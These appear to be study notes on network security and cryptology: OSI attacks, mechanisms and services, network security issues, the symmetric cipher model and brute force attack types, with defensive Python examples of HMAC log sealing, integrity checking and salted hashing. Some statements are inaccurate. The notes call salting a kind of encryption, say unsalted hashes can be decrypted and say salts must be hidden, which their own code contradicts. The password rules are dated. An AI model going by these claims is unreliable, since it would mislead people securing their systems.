NSC Notes

Cryptology is the study of cryptography and cryptanalysis. Cryptography involves securing information through codes, while cryptanalysis involves breaking secret codes. Network security refers to measures taken to secure computer networks and data. The OSI security architecture provides a framework for network security, including describing security attacks, mechanisms, and services. There are two main types of security attacks - passive attacks like eavesdropping, and active attacks like masquerading, message modification, replay attacks, and denial of service. Security mechanisms implemented at each OSI layer help prevent attacks and can include encryption, digital signatures, access control, data integrity checks, authentication, and traffic padding.


1. INTRODUCTION
CRYPTOLOGY:
Cryptology is the science concerned with data communication and storage in secure and usually
secret form. In other words, it is the study of techniques for ensuring the security and
authenticity of information. It encompasses two main branches: cryptography and
cryptanalysis.
CRYPTOGRAPHY:
Cryptography is the technique of securing information and communications through the use of
codes so that only the persons for whom the information is intended can understand and
process it, thus preventing unauthorized access to the information. The prefix “crypt”
means “hidden” and the suffix “graphy” means “writing”.
CRYPTANALYSIS:
Cryptanalysis is the study of cryptographic algorithms and the breaking of secret codes. A
person practicing cryptanalysis is called a cryptanalyst. Cryptanalysis helps us to better
understand cryptosystems and to improve them by finding weak points, so that the algorithm
can be reworked into a more secure secret code. For example, a cryptanalyst might try to
decipher a ciphertext to derive the plaintext; cryptanalysis can help to deduce the plaintext
or the encryption key.
NETWORK SECURITY:
Network security refers to the measures taken by an enterprise or organization to secure its
computer network and data using both hardware and software systems. It aims at securing the
confidentiality and accessibility of the data and the network. Every company or organization
that handles a large amount of data has some degree of protection against the many cyber
threats.
The most basic example of network security is password protection, where the user of the
network chooses the password.

Q1: OSI Security Architecture:


The OSI security architecture assists the managers responsible for the security of an
organization in describing the requirements for security. It was introduced as an
‘international standard’ which allows computer and communication vendors to produce products
that have security features based on this architecture.
The OSI security architecture gives a structured description of services and mechanisms for
protecting the organization’s data. It focuses on security attacks, security mechanisms, and
security services.
These can be summarised as follows −
Security attack − Any action that compromises the security of information owned by an
organization.
Security mechanism − A process (or a device incorporating such a process) that is designed
to detect, prevent, or recover from a security attack.
Security service − A processing or communication service that enhances the security of the
data processing systems and the information transfers of an organization. The services are
intended to counter security attacks, and they make use of one or more security mechanisms
to provide the service.

SECURITY ATTACKS (2 TYPES 1. PASSIVE & 2. ACTIVE)


Passive attacks: A passive attack attempts to learn or make use of information from the
system but does not affect system resources. Passive attacks are in the nature of
eavesdropping on, or monitoring of, transmissions. The goal of the opponent is to obtain
information that is being transmitted. The types of passive attack are as follows:
• The release of message content
• Traffic analysis
The release of message content –
A telephone conversation, an electronic mail message, or a transferred file may contain
sensitive or confidential information. We would like to prevent an opponent from learning the
contents of these transmissions.

[Figure: Passive attack]

Traffic analysis –
Suppose that we had a way of masking (encrypting) the information, so that even if the
attacker captured the message, they could not extract any information from it.

[Figure: Traffic analysis]
The opponent could still determine the location and identity of the communicating hosts and
could observe the frequency and length of the messages being exchanged. This information
might be useful in guessing the nature of the communication that was taking place.
The most useful protection against traffic analysis is encryption of the traffic (for example,
of SIP signalling). An attacker would then have to access the SIP proxy (or its call log) to
determine who made the call.

Active attacks: An active attack attempts to alter system resources or affect their
operation. Active attacks involve some modification of the data stream or the creation of a
false stream. The types of active attack are as follows:
• Masquerade
• Modification of messages
• Repudiation
• Replay
• Denial of Service
Masquerade –
A masquerade attack takes place when one entity pretends to be a different entity. A
masquerade attack usually includes one of the other forms of active attack. If an
authentication procedure is not fully protected, it can become extremely vulnerable to a
masquerade attack. Masquerade attacks may be carried out using stolen passwords and
logins, by finding gaps in programs, or by finding a way around the authentication process.

[Figure: Masquerade attack]

Modification of messages –

[Figure: Modification of messages]
It means that some portion of a legitimate message is altered, or that messages are delayed
or reordered, to produce an unauthorized effect. Modification is an attack on the integrity of
the original data. It means that unauthorized parties not only gain access to data but also
tamper with it, for example by altering transmitted data packets or by flooding the network
with fake data, which can trigger denial-of-service conditions. Fabrication is an attack on
authenticity. For example, a message meaning “Allow JOHN to read confidential file X” is
modified to “Allow Smith to read confidential file X”.

Replay –
It involves the passive capture of a message and its subsequent retransmission to produce an
unauthorized effect. In this attack, the basic aim of the attacker is to save a copy of data
originally present on that particular network and later reuse that data for their own purposes.
Once the data is captured or leaked, it is insecure and unsafe for the users.

[Figure: Replay attack]

Denial of Service –
It prevents the normal use of communication facilities. This attack may have a specific target.
For example, an entity may suppress all messages directed to a particular destination.
Another form of service denial is the disruption of an entire network either by disabling the
network or by overloading it with messages so as to degrade performance.

[Figure: Denial of service]
SECURITY MECHANISMS:
• Specific security mechanisms
• Pervasive security mechanisms

Specific security mechanisms


A security mechanism is a process (or a device incorporating such a process) that is designed
to detect, prevent, or recover from a security attack. The mechanisms are divided into those
that are implemented in a specific protocol layer, such as TCP or an application-layer
protocol, and those that are not; the former are known as specific security mechanisms.
They may be incorporated into the appropriate protocol layer in order to provide some of the
OSI security services. The approaches for realizing security are as follows −
• Encipherment − This is the use of mathematical algorithms to transform data
into a form that is not readily intelligible. The transformation and subsequent
recovery of the data depend on an algorithm and zero or more encryption
keys.
• Digital Signature − A digital signature is a mathematical technique which validates
the authenticity and integrity of a message, software or digital document. It
allows us to verify the author’s name, the date and time of the signature, and
the message text.
The digital signature provides far more inherent security and is designed to solve
the problem of tampering and impersonation (deliberately copying another person’s
characteristics) in digital communications.
Data, or a cryptographic transformation of a data unit, is appended to the data
unit so that the recipient of the data unit is convinced of the source and
integrity of the data unit; this can also serve to protect the data against
forgery (such as by the recipient).
• Access Control − Access control is an information security process that
enables organizations to manage who is authorized to access corporate data
and resources.
Secure access control needs policies that verify users are who they claim to be
and ensure that the appropriate access levels are granted to users. Several
mechanisms are available that enforce access rights to resources.
• Data Integrity − Integrity can apply to a stream of messages, a single
message, or selected fields within a message. A connection-oriented integrity
service deals with a stream of messages and assures that messages are
received as sent, with no duplication, insertion, modification, reordering, or
replays.
Several mechanisms can be used to assure the integrity of a data unit or stream
of data units.
• Authentication Exchange − This is a mechanism intended to ensure the identity
of an entity by means of information exchange.
• Traffic Padding − The insertion of bits into gaps in a data stream is known
as traffic padding. This serves to frustrate traffic analysis attempts.
• Routing Control − Routing control enables the selection of particular physically
secure routes for certain data and allows routing changes, especially when a
breach of security is suspected.
• Notarization − This is the use of a trusted third party to assure certain
properties of a data exchange.
Pervasive security mechanisms
Security mechanisms are divided into those that are implemented in a specific protocol layer,
such as TCP or an application-layer protocol, and those that are not specific to any particular
protocol layer or security service. The latter are called pervasive security mechanisms.
Pervasive security is supported by a set of physical and network interfaces to a service: the
user’s client device establishes network connectivity to the service, and the service
broadcasts an identifier to the user’s client device.
The service can then determine whether the user entered the identifier into the service while
in physical proximity to it, and grant access to the service because the user entered the
identifier while in physical proximity to the service.
Pervasive secure access means being able to recognise risk at each interaction point, using
several means (identifying anomalies in client behaviour, or considering contextual clues such
as location and device, etc.), and asking the client for additional authentication when the
level of risk warrants it.
This risk-based method provides the opportunity to step up to multi-factor authentication when
appropriate, but does not demand more authentication when it is not warranted. It ensures that
access is both secure enough to protect the organization and usable enough to minimise
friction for users.
The service can indicate that access has been granted by sending a control page to the user’s
client device. These are the mechanisms that are not specific to any particular OSI security
service or protocol layer.
Some mechanisms can also be regarded as aspects of security management, which are as
follows −
• Trusted Functionality − That which is perceived to be correct with respect to
some criteria, such as those established by a security policy.
• Security Label − The marking bound to a resource (which may be a data unit)
that names or designates the security attributes of that resource.
• Event Detection − Detection of security-relevant events, including forgery,
denial of sending or receiving of information, modification of information, etc.
• Security Audit Trail − Audit trails are a valuable security mechanism, as they
potentially allow detection and analysis of breaches of security by permitting a
subsequent security audit.
A security audit is an independent review and examination of system records and
activities in order to test the adequacy of system controls, to ensure compliance
with established policy and operational procedures, to aid in damage assessment,
and to recommend any indicated changes in controls, policy and procedures.
• Security Recovery − This deals with requests from mechanisms, such as
event handling and management functions, and takes recovery actions.

SECURITY SERVICES:
There are various security services, which are as follows −
Message Confidentiality − The principle of confidentiality specifies that only the sender and
the intended recipient should be able to access the contents of the message. It protects the
transmitted data from passive attacks.
Confidentiality can be applied at several levels depending on the content of the information to
be transmitted. The types of confidentiality are as follows −
o Connection Confidentiality − The protection of all user
data on a connection.
o Connectionless Confidentiality − The protection of all user data
in a single data block.
o Selective-field Confidentiality − The confidentiality of selected fields
within the user data on a connection or in a single data block.
o Traffic-flow Confidentiality − The protection of the information
that could be derived from observation of traffic flows.
Authentication − The authentication service is concerned with assuring that a communication is
authentic. In the case of a single message, such as a warning or alarm signal, the function
of the authentication service is to assure the recipient that the message is from the source
that it claims to be from.
In the case of an ongoing interaction, such as the connection of a terminal to a host, two
aspects are involved. First, at the time of connection initiation, the service assures that the
two entities are authentic, that is, that each is the entity that it claims to be. Second, the
service must assure that the connection is not interfered with in such a way that a third party
can masquerade as one of the two legitimate parties for the purposes of unauthorized
transmission or reception.

Two specific authentication services are defined in X.800:

• Peer entity authentication: Provides for the corroboration of the identity of a peer
entity in an association. Two entities are considered peers if they implement the same
protocol in different systems; e.g., two TCP modules in two communicating systems. Peer
entity authentication is provided for use at the establishment of, or at times during the data
transfer phase of, a connection. It attempts to provide confidence that an entity is not
performing either a masquerade or an unauthorized replay of a previous connection.

• Data origin authentication: Provides for the corroboration of the source of a data unit.
It does not provide protection against the duplication or modification of data units. This type
of service supports applications like electronic mail, where there are no prior interactions
between the communicating entities.

Non-repudiation − Non-repudiation prevents either the sender or the receiver from denying a
transmitted message. Thus, when a message is sent, the receiver can prove that the
alleged sender in fact sent the message.
Likewise, when a message is received, the sender can prove that the alleged receiver
in fact received the message.
Non-repudiation uses cryptography, such as digital signatures, and comprises
authentication, auditing, and logging services. Non-repudiation can be achieved in a
variety of ways, such as digitally signing log data as a checksum during collection or
using secured storage media.
In Data Audit Logs
Typically, a digital signature based on a hash algorithm is computed against the log file at
the time of collection. The output of this computation is a checksum that is used to verify that
the file has not been manipulated. If the file is altered in any way, the hash produces
a different value, and the log file fails the integrity check. If the checksum matches, the log is
confirmed to be in its original state.
In Online Transactions
In online transactions, digital signatures guarantee that a party cannot later dispute
having sent information or question the legitimacy of its signature. A
digital signature is formed using a key pair consisting of a private key and a public key. Only
the holder of the private key can generate the signature, which confirms that that
holder electronically signed the document and assures that the person cannot later
dispute having supplied the signature, hence ensuring non-repudiation.
In Cryptography
A message authentication code (MAC), also called a tag in cryptography, is used to
authenticate messages, i.e., to confirm that the message originated from the stated sender
and was not altered in transit. MAC values, unlike digital signatures, are generated and
verified using the same secret key, on which the sender and receiver must agree before
commencing communication.
A MAC prevents message forgery by anyone who does not have access to the shared
secret key, ensuring both integrity and authenticity. Non-repudiation cannot be provided by
MAC schemes such as block-cipher-based MAC (CMAC) and hash-based MAC (HMAC).
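The following is an added example (not part of these notes) that ties the audit-log checksum and the MAC discussion together: an HMAC-SHA256 tag is computed over a constructed log file at collection time, verification detects a later edit, and the last step shows why a MAC alone cannot give non-repudiation: whoever holds the shared key (including the verifier) can produce a valid tag for an edited file. The log lines and the key value are constructed for the example.

```python
import hmac
import hashlib

# Constructed sample log file "as collected" from a host (not real data).
LOG_FILE = (
    "2024-01-01T10:00:00Z login user=alice src=10.0.0.5 result=success\n"
    "2024-01-01T10:05:12Z sudo user=alice cmd=/bin/ls\n"
    "2024-01-01T10:07:44Z logout user=alice\n"
).encode()

# Key shared between the collector and the verifier (hypothetical value).
COLLECTION_KEY = b"collector-secret-key-example"


def seal_log(log: bytes, key: bytes) -> str:
    """Compute the checksum (an HMAC-SHA256 tag) over the log at collection time."""
    return hmac.new(key, log, hashlib.sha256).hexdigest()


def verify_log(log: bytes, tag: str, key: bytes) -> bool:
    """Integrity check: recompute the tag and compare it in constant time."""
    expected = seal_log(log, key)
    return hmac.compare_digest(expected, tag)


def tamper(log: bytes) -> bytes:
    """Simulate an after-the-fact edit: drop the 'sudo' line from the log."""
    return b"".join(line + b"\n" for line in log.splitlines() if b"sudo" not in line)


def demo():
    """Returns (original verifies, edited log verifies, verifier-forged tag verifies)."""
    tag = seal_log(LOG_FILE, COLLECTION_KEY)
    original_ok = verify_log(LOG_FILE, tag, COLLECTION_KEY)

    edited = tamper(LOG_FILE)
    edited_ok = verify_log(edited, tag, COLLECTION_KEY)   # tag no longer matches

    # Anyone holding the shared key, here the verifier itself, can re-seal the
    # edited log. The tag therefore proves integrity to the key holders but cannot
    # prove to a third party WHO produced it, which is the non-repudiation gap.
    forged_tag = seal_log(edited, COLLECTION_KEY)
    forged_ok = verify_log(edited, forged_tag, COLLECTION_KEY)
    return original_ok, edited_ok, forged_ok


if __name__ == "__main__":
    print(demo())
```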
In Digital Contracts and Email
A signatory of an email on one side of the communication cannot deny sending the message,
and the receiver cannot deny receiving it. Email non-repudiation entails techniques such as
email monitoring.
In E-commerce
Non-repudiation is implemented to aid in dispute resolution of any kind. It gives confirmation
that a message was received and acknowledged by the receiver. E-commerce site security is
crucial for a variety of reasons, including protecting consumers' privacy and sensitive data on
a website, securing an online business's funds, and avoiding fraud and financial scams.
In Business-to-Business Transactions
Non-repudiation is also used in B2B transactions. It allows your business to
prove that it received or sent a message from or to a trading partner if the trading partner
repudiates the transmission or receipt of messages or receipts. Non-repudiation entails two
levels of security, which are as follows −
• Non-repudiation of received or sent communications - Both the transmitting and
receiving parties keep the message exchanged (the business document and
any attachments) in its original format. The transmitting message service
handler (MSH) saves a message before sending it, and the receiving MSH
saves a message before processing it.
• Non-repudiation of receipts issued after a message is received - A receipt is
sent by the receiver of a message to acknowledge receipt of a message. You
can exchange a signed receipt, which adds another layer of protection. Signed
receipts allow you to confirm the legitimacy of the replying company or individual
as well as the content integrity.
A Non-Repudiation-Information element is included in the receipt when signed
communications are exchanged with a trade partner. The non-repudiation element includes
the message digest transmitted to the trade partner. The sender compares the digest to the
original message to verify that the message content was not altered during transmission by
an attacker.
Access Control − The principle of access control determines who should be able to access
information or a system through a communication link. It provides for the prevention of
unauthorized use of a resource.

Data Integrity − Data integrity is designed to protect information from modification, insertion,
deletion and replay by any entity. Data integrity can apply to a stream of messages, a
single message or selected fields within a message. Data integrity can be used to
support total stream protection.
There are the following types of data integrity −
o Connection integrity with recovery − Provides for the
integrity of all user data on a connection and detects any
modification, insertion, deletion or replay of any data
within an entire data sequence, with recovery attempted.
o Connection integrity without recovery − Provides only detection,
without recovery.
o Selective-field connection integrity − Provides for the
integrity of selected fields within the user data of a data
block transferred over a connection and takes the form of
determination of whether the selected fields have been modified,
inserted, deleted or replayed.
o Connectionless integrity − Provides for the integrity of a
single connectionless data block and may take the form of
detection of data modification. Additionally, a limited form of
replay detection may be provided.
o Selective-field connectionless integrity − Provides for the
integrity of selected fields within a single connectionless
data block and takes the form of determination of whether the
selected fields have been modified.
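As an added example (not from these notes), the receiver below implements the "connection integrity without recovery" service for a stream of framed messages: each frame carries a sequence number and an HMAC-SHA256 tag over sequence number and payload, and the receiver classifies each arriving frame as modified, replayed, reordered, or following a gap (a deleted or lost frame). The frame format, key value and messages are constructed for the example.

```python
import hmac
import hashlib
import struct

KEY = b"per-connection-key-example"   # hypothetical key shared by both ends
TAG_LEN = 32                          # HMAC-SHA256 output size


def protect(seq: int, payload: bytes, key: bytes = KEY) -> bytes:
    """Sender side: frame = 4-byte big-endian seq || payload || tag.
    The tag covers seq and payload, so neither can be changed unnoticed."""
    header = struct.pack(">I", seq)
    tag = hmac.new(key, header + payload, hashlib.sha256).digest()
    return header + payload + tag


class IntegrityReceiver:
    """Connection integrity without recovery: detects and classifies, never repairs."""

    def __init__(self, key: bytes = KEY):
        self.key = key
        self.expected_seq = 0   # next sequence number we expect in order
        self.seen = set()       # sequence numbers already accepted

    def check(self, frame: bytes) -> str:
        if len(frame) < 4 + TAG_LEN:
            return "MALFORMED"
        header, payload, tag = frame[:4], frame[4:-TAG_LEN], frame[-TAG_LEN:]
        expected_tag = hmac.new(self.key, header + payload, hashlib.sha256).digest()
        if not hmac.compare_digest(expected_tag, tag):
            return "MODIFIED"        # payload or seq altered, or wrong key
        seq = struct.unpack(">I", header)[0]
        if seq in self.seen:
            return "REPLAY"          # valid tag, but this frame was already delivered
        if seq < self.expected_seq:
            return "REORDERED"       # older than frames already accepted, never seen
        verdict = "OK" if seq == self.expected_seq else "GAP"   # GAP: deletion/loss
        self.seen.add(seq)
        self.expected_seq = seq + 1
        return verdict


def demo():
    """Feed a receiver a scripted sequence of events and return the verdicts."""
    rx = IntegrityReceiver()
    f0, f1, f2 = (protect(i, b"msg%d" % i) for i in range(3))
    tampered = bytearray(f1)
    tampered[4] ^= 0x01              # flip one bit of the payload of frame 1
    return [
        rx.check(f0),                # OK: in order
        rx.check(f2),                # GAP: frame 1 missing (deleted or lost)
        rx.check(f1),                # REORDERED: late arrival of frame 1
        rx.check(f0),                # REPLAY: frame 0 delivered again
        rx.check(bytes(tampered)),   # MODIFIED: tag no longer matches
    ]


if __name__ == "__main__":
    print(demo())
```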

Q2: NETWORK SECURITY ISSUES, THREATS AND SOLUTIONS:


We all tend to fall into one or more of these habits over time, so to help remind us of what
we need to look out for, here are some common network security issues and their
solutions.
1. Non-complex or Weak Network Access Passwords: Most network system
administrators are exposed to an “old school” exploit known as brute forcing. In order to
correct this network security password vulnerability, many have implemented
“CAPTCHA technology.” A common type of CAPTCHA requires the user to type
letters or digits from a distorted image that appears on screen, which is commonly
used to prevent unwanted Internet bots from accessing websites and networks. This
technology has given network security administrators a false sense of security with
regard to countering brute forcing.
The solution for the above issue is a complex password. In order to create a complex
password, you need seven or more characters combined with at least three numbers
and one special character (capital letters, @ or # signs, etc.).
Network security administrators should require the creation of complex passwords as
well as implement a password expiration system to remind users to change their
passwords regularly. A restriction on how soon a password can be reused is another
handy precaution, so that someone isn’t cycling between two different passwords
every month or so.
2. Outdated Server Application or Software: Companies constantly release patches
in order to ensure that our systems are not vulnerable to newly public threats. Hackers
consistently release new threats and exploits which could harm our
network if these patches are not in place. A simple solution is to ensure our system
administrator is regularly informed of new threats and updates our applications on
a monthly basis.
3. Web Cookies: Although cookies do not carry viruses and cannot install malware on
the host computer, tracking cookies and third-party tracking cookies are
commonly used to compile records of individuals’ browsing histories.
Unencrypted cookies are a major network security issue because they can expose our
system to an XSS (Cross-Site Scripting) vulnerability, which is also a major privacy
concern. With ‘open cookies’ anyone could have access to any login data cookies
(saved password sessions) on the network, which creates a major vulnerability in our
network security. The solution is to ensure all of our network cookies are
encrypted and have an encoded expiration time. Our network administrator should also
force users to log in again whenever they access sensitive directories on our network.
4. Plain Hashes: “Anyone who knows their stuff can decrypt a hash that is not salted.”
Hashing is used to index and retrieve items in a database, and plain hashes are also
used in many encryption algorithms. A salt (which is another type of encryption) is
added to hashes in order to make a lookup-table-assisted dictionary attack (or brute
force) impractical or extremely difficult, provided the salt is large enough. Basically,
an attacker would not be able to use a pre-computed lookup table to assist in attacking
our network, which adds a whole new level of complexity to our network security
system. So even if an attacker gains access to and compromises our database (table), it
will still be very difficult for the attacker to retrieve the information. The best way to
ensure safety with regard to hashes is for our network administrator to hide the salt (or
encryption key), because if a hacker is able to gain access to our salt
they can access our network system. Salt all of our hashes. No salt means no security.
5. Shared Hosting (not Cloud-Server Based): Suppose we are running a legitimate
business and have a website with access to our internal network; shared hosting is
not the way to go! A shared web hosting service is one where many websites reside on
one web server connected to the Internet. Each site sits on its own partition, section
or space on the server, to keep it separate from the other sites. This is generally the most
economical option for hosting, because people share the overall cost of server
maintenance. Think of it this way: shared hosting is like sharing a house with other
people, and if someone breaks into our roommate’s bedroom, or any other area of the
home for that matter, they’ll also be able to access our own room!
The same concept applies to shared hosting. Once an attacker is inside one area
of the shared server, it’s almost as if they have a skeleton key that fits all of the locks.
The best solution is to have dedicated server hosting and/or secure cloud hosting.
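As an added example (not from these notes) for issue 4 above, the code contrasts the weak scheme, an unsalted fast hash, with a per-user random salt plus a slow key derivation (PBKDF2-HMAC-SHA256 from the Python standard library). A small constructed lookup table of common-password hashes stands in for a precomputed table: it recovers the password from the plain hash but not from the salted one, and two users with the same password no longer share a stored value. The password list, iteration count and user values are constructed for the example; the salt here is random per user and stored beside the digest.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

ITERATIONS = 100_000   # work factor for PBKDF2 (constructed value for the example)

# Constructed stand-in for a precomputed lookup table: unsalted SHA-256 of a few
# common passwords, mapped back to the password.
COMMON_PASSWORDS = ["password", "123456", "qwerty", "letmein"]
PLAIN_TABLE = {hashlib.sha256(p.encode()).hexdigest(): p for p in COMMON_PASSWORDS}


def plain_hash(password: str) -> str:
    """Weak scheme: unsalted, fast hash. Same password -> same stored value."""
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Hardened scheme: fresh 16-byte random salt per user and a slow KDF.
    Returns (salt, digest); both are stored, the salt need not be secret."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_salted(password: str, salt: bytes, stored_digest: bytes) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _, digest = salted_hash(password, salt)
    return hmac.compare_digest(digest, stored_digest)


def table_lookup(stored_value: str) -> Optional[str]:
    """What a precomputed table recovers from a leaked stored value (None if nothing)."""
    return PLAIN_TABLE.get(stored_value)


def demo() -> dict:
    """Compare the two schemes for the constructed password 'letmein'."""
    weak = plain_hash("letmein")
    salt1, strong1 = salted_hash("letmein")   # user A
    salt2, strong2 = salted_hash("letmein")   # user B, same password, different salt
    return {
        "plain_recovered": table_lookup(weak),             # 'letmein'
        "salted_recovered": table_lookup(strong1.hex()),   # None: table is useless
        "same_pw_same_value_plain": plain_hash("letmein") == weak,   # True
        "same_pw_same_value_salted": strong1 == strong2,             # False
        "verify_ok": verify_salted("letmein", salt1, strong1),       # True
        "verify_wrong": verify_salted("letmeout", salt1, strong1),   # False
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```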

Q3: Network Security Model

A Network Security Model exhibits how the security service has been designed over the
network to prevent the opponent from causing a threat to the confidentiality or authenticity of
the information that is being transmitted through the network.

In this section we discuss the general ‘network security model’, in which we study how
messages are shared securely between the sender and receiver over the network. We
also discuss the ‘network access security model’, which is designed to secure your system
from unwanted access through the network.
For a message to be sent or received there must be a sender and a receiver. Both the sender
and the receiver must also mutually agree to the sharing of the message. The
transmission of a message from sender to receiver needs a medium, i.e. an information
channel, which is an Internet service.

A logical route is defined through the network (Internet) from the sender to the receiver, and
using the communication protocols both the sender and the receiver establish
communication.

We are concerned about the security of the message over the network when the
message contains confidential or authentic information which is threatened by an
opponent present on the information channel. Any security service would have the three
components discussed below:

1. Transformation of the information which has to be sent to the receiver, so that any
opponent present on the information channel is unable to read the message. This means
the encryption of the message. It also includes the addition of a code during the
transformation of the information which will be used to verify the identity of the authentic
receiver.

2. Sharing of the secret information between sender and receiver, of which the opponent
must not have any clue. Yes, we are talking of the encryption key, which is used during the
encryption of the message at the sender’s end and also during the decryption of the message
at the receiver’s end.

3. There must be a trusted third party which takes the responsibility of distributing
the secret information (key) to both the communicating parties and also keeps it from any
opponent.

Now we will study a general network security model with the help of the figure given below:

The network security model presents the two communicating parties, sender and receiver,
who mutually agree to exchange the information. The sender has information to share with
the receiver. But the sender cannot send the message over the information channel in
readable form, as it would be at risk of being attacked by the opponent. So, before sending
the message through the information channel, it should be transformed into an unreadable
format.

Secret information is used while transforming the message, and it is also required when the
message is transformed back at the recipient’s side. That’s why a trusted third party is
required, which takes the responsibility of distributing this secret information to both the
parties involved in the communication.

So, considering this general model of network security, one must consider the following four
tasks while designing the security model.

1. To transform a readable message at the sender side into an unreadable format, an
appropriate algorithm should be designed such that it is difficult for an opponent to
break that security algorithm.

2. Next, the network security model designer is concerned with the generation of the
secret information, which is known as a key.
This secret information is used in conjunction with the security algorithm in order to
transform the message.

3. Now, the secret information is required at both ends, the sender’s end and the receiver’s end.
At the sender’s end it is used to encrypt, or transform, the message into unreadable form, and at
the receiver’s end it is used to decrypt, or transform, the message back into readable form.
So, there must be a trusted third party which will distribute the secret information to both
sender and receiver. While designing the network security model, the designer must also
concentrate on developing the methods to distribute the key to the sender and receiver.
An appropriate methodology must be used to deliver the secret information to the
communicating parties without interference from the opponent.

4. It must also be ensured that the communication protocols used by the communicating
parties support the security algorithm and the secret key in order to achieve the
security service.

Till now we have discussed the security of the information or message over the network.
Now, we will discuss the network access security model which is designed to secure the
information system which can be accessed by the attacker through the network.

You are well aware of the attackers who attack systems that are accessible through the
internet. These attackers fall into two categories:

1. Hacker: One who is only interested in penetrating your system. Hackers do not
cause any harm to your system; they are satisfied simply by gaining access to it.

2. Intruders: These attackers intend to damage your system, or try to obtain
information from the system that can be used for financial gain.

The attacker can place a logical program on your system through the network which can
affect the software on your system. This leads to two kinds of risks:

a. Information threat: This kind of threat modifies data on the user’s behalf that the user
should not actually be able to access, such as enabling some crucial permission in the system.
b. Service threat: This kind of threat prevents the user from accessing data on the system.

2. CLASSICAL ENCRYPTION TECHNIQUES

Q1: Symmetric Cipher Model


Symmetric Encryption is the most basic and oldest method of encryption. It uses only one key
for both the encryption and the decryption of data. Thus, it is also known as
Single-Key Encryption.
A few basic terms in Cryptography are as follows:
Plain Text: original message to be communicated between sender and receiver
Cipher Text: encoded format of the original message that cannot be understood by humans
Encryption (or Enciphering): the conversion of plain text to cipher text
Decryption (or Deciphering): the conversion of cipher text to plain text, i.e., reverse of
encryption

The Symmetric Cipher Model:

A symmetric cipher model is composed of five essential parts:

1. Plain Text (x): This is the original data/message that is to be communicated to the
receiver by the sender. It is one of the inputs to the encryption algorithm.
2. Secret Key (k): It is a value/string/text file used by the encryption and decryption algorithms
to encode the plain text into cipher text and decode it back, respectively. It is
independent of the encryption algorithm. It governs all the conversions of the plain text: all the
substitutions and transformations performed depend on the secret key.
3. Encryption Algorithm (E): It takes the plain text and the secret key as inputs and
produces cipher text as output. It applies several techniques, such as substitutions and
transformations, to the plain text using the secret key.
E(x, k) = y
4. Cipher Text (y): It is the transformed form of the plain text (x), which is unreadable for
humans, hence protecting the message during transmission. It is completely dependent
upon the secret key provided to the encryption algorithm. Each unique secret key produces
a unique cipher text.
5. Decryption Algorithm (D): It performs the reversal of the encryption algorithm at the
recipient’s side. It also takes the secret key as input and decodes the cipher text received
from the sender based on the secret key. It produces plain text as output.
D(y, k) = x

Requirements for Encryption:

There are only two requirements that need to be met to perform encryption. They are,
1. Encryption Algorithm: There is a need for a very strong encryption algorithm that
produces cipher texts in such a way that the attacker should be unable to crack the secret
key even if they have access to one or more cipher texts.
2. Secure way to share Secret Key: There must be a secure and robust way to share the
secret key between the sender and the receiver. It should be leakproof so that the attacker
cannot access the secret key.

Cryptography
Cryptographic systems are characterized along three independent dimensions:

1. The type of operations used for transforming plaintext to ciphertext. All encryption
algorithms are based on two general principles: substitution, in which each element in the
plaintext (bit, letter, group of bits or letters) is mapped into another element, and transposition,
in which elements in the plaintext are rearranged. The fundamental requirement is that no
information be lost (that is, that all operations are reversible). Most systems, referred to
as product systems, involve multiple stages of substitutions and transpositions.

2. The number of keys used. If both sender and receiver use the same key, the system
is referred to as symmetric, single-key, secret-key, or conventional encryption. If the sender
and receiver use different keys, the system is referred to as asymmetric, two-key, or
public-key encryption.

3. The way in which the plaintext is processed. A block cipher processes the input one
block of elements at a time, producing an output block for each input block. A stream
cipher processes the input elements continuously, producing output one element at a time,
as it goes along.

Q2: Brute Force Attack

A brute force attack is a hacking method that uses trial and error to crack passwords, login
credentials, and encryption keys. It is a simple yet reliable tactic for gaining unauthorized
access to individual accounts and organizations’ systems and networks. The hacker tries
multiple usernames and passwords, often using a computer to test a wide range of
combinations, until they find the correct login information.

The name "brute force" comes from attackers using excessively forceful attempts to gain
access to user accounts. Despite being an old cyberattack method, brute force attacks are
tried and tested and remain a popular tactic with hackers.
Types of Brute Force Attacks

There are various types of brute force attack methods that allow attackers to gain
unauthorized access and steal user data.
1. Simple Brute Force Attacks

A simple brute force attack occurs when a hacker attempts to guess a user’s login
credentials manually without using any software. This is typically through standard password
combinations or personal identification number (PIN) codes.

These attacks are simple because many people still use weak passwords, such as
"password123" or "1234," or practice poor password etiquette, such as using the same
password for multiple websites. Passwords can also be guessed by hackers that do minimal
reconnaissance work to crack an individual's potential password, such as the name of their
favorite sports team.
2. Dictionary Attacks

A dictionary attack is a basic form of brute force hacking in which the attacker selects a
target, then tests possible passwords against that individual’s username. The attack method
itself is not technically considered a brute force attack, but it can play an important role in a
bad actor’s password-cracking process.

The name "dictionary attack" comes from hackers running through dictionaries and
amending words with special characters and numbers. This type of attack is typically time-
consuming and has a low chance of success compared to newer, more effective attack
methods.
3. Hybrid Brute Force Attacks

A hybrid brute force attack is when a hacker combines a dictionary attack method with a
simple brute force attack. It begins with the hacker knowing a username, then carrying out a
dictionary attack and simple brute force methods to discover an account login combination.

The attacker starts with a list of potential words, then experiments with character, letter, and
number combinations to find the correct password. This approach allows hackers to discover
passwords that combine common or popular words with numbers, years, or random
characters, such as "SanDiego123" or "Rover2020."
4. Reverse Brute Force Attacks

A reverse brute force attack sees an attacker begin the process with a known password,
which is typically discovered through a network breach. They use that password to search
for a matching login credential using lists of millions of usernames. Attackers may also use a
commonly used weak password, such as "Password123," to search through a database of
usernames for a match.
5. Credential Stuffing

Credential stuffing preys on users’ weak password etiquettes. Attackers collect username
and password combinations they have stolen, which they then test on other websites to see
if they can gain access to additional user accounts. This approach is successful if people
use the same username and password combination or reuse passwords for various
accounts and social media profiles.
Q3: Substitution Methods:

The two basic building blocks of all encryption techniques are substitution and transposition.
The substitution technique is a classical encryption approach in which the characters of the
original message are replaced by other characters, numbers or symbols. If the plain
text (original message) is treated as a string of bits, the substitution technique
replaces bit patterns of the plain text with bit patterns of the cipher text.
There are various types of substitution ciphers which are as follows –
• Caesar Cipher
• Monoalphabetic Ciphers
• Playfair Cipher
• Hill Cipher
• Polyalphabetic Ciphers
